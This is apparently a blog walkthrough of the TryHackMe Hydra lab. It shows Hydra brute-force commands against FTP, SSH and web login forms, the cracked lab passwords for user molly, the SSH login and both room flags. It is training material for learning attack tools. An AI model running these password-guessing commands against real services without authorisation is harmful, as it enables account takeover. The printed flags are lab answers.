Hydra (TryHackMe Walkthrough)

Bibek Thapa Magar
Mar 27, 2021

What is Hydra?

Hydra comes pre-installed on Kali Linux. It is used to brute-force passwords online: we can use Hydra to run through a list of passwords and brute-force some authentication service.

Hydra has the ability to brute-force the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Hydra Commands

The options we pass into Hydra depend on which service (protocol) we’re attacking. For example, if we wanted to brute-force FTP with the username being user and a password list being passlist.txt, we’d use the following command:

hydra -l user_name -P password_list.txt ftp://<machine IP>

For the purpose of this deployed machine, here are the commands to use Hydra on SSH and a web form (POST method).

SSH

hydra -l <username> -P <full path to pass> <machine IP> -t 4 ssh

Post Web Form

We can use Hydra to brute-force web forms too. You have to know which type of request the form is making; GET or POST methods are normally used. You can use your browser's network tab (in developer tools) to see the request types, or simply view the source code. Below is an example Hydra command to brute-force a POST login form:

hydra -l <username> -P <wordlist> <machine IP> http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

Use Hydra to brute force molly’s web password. What is flag 1?

In the terminal, enter:

hydra -l molly -P /usr/share/wordlists/rockyou.txt <machine IP> http-post-form "/login:username=^USER^&password=^PASS^:incorrect"

It tries the passwords from rockyou.txt and shows the correct password, which in our case is:

[80][http-post-form] host: Machine’s IP login: molly password: sunshine

So use this password to log in to the web page served at the machine's IP.

username: molly

Password: sunshine

[Screenshot: brute-forcing the password]
[Screenshot: after logging in with the found password]

There is the flag: THM{2673a7dd116de68e85c48ec0b1f2612e}

Use Hydra to bruteforce molly’s SSH password. What is flag 2?

Here you need to brute-force the SSH password. Try it with the following command:

hydra -l molly -P /usr/share/wordlists/rockyou.txt ssh://<machine IP>

Here you will again get a valid password, shown in highlighted text:

username : molly

Password : butterfly

Now, think for a while and you will realize that the flag must be on the machine, so you must log in via SSH. Log in to the machine using SSH:

ssh molly@<machine IP>

Now type “Yes” if it asks you whether you want to continue.

Enter the password, i.e. butterfly

[Screenshot: Bruteforcing SSH]

Once you are logged in, try

ls

There is a file named flag2.txt.

[Screenshot: finding the flag]
[Screenshot: reading the flag]

Now cat the file, i.e. cat flag2.txt

Ans: THM{c8eeb0468febbadea859baeb33b2541b}

Bibek Thapa Magar

I’m an electronics and Communication Engineer/ Cybersecurity Enthusiast/ Musician / Photographer / Video Editor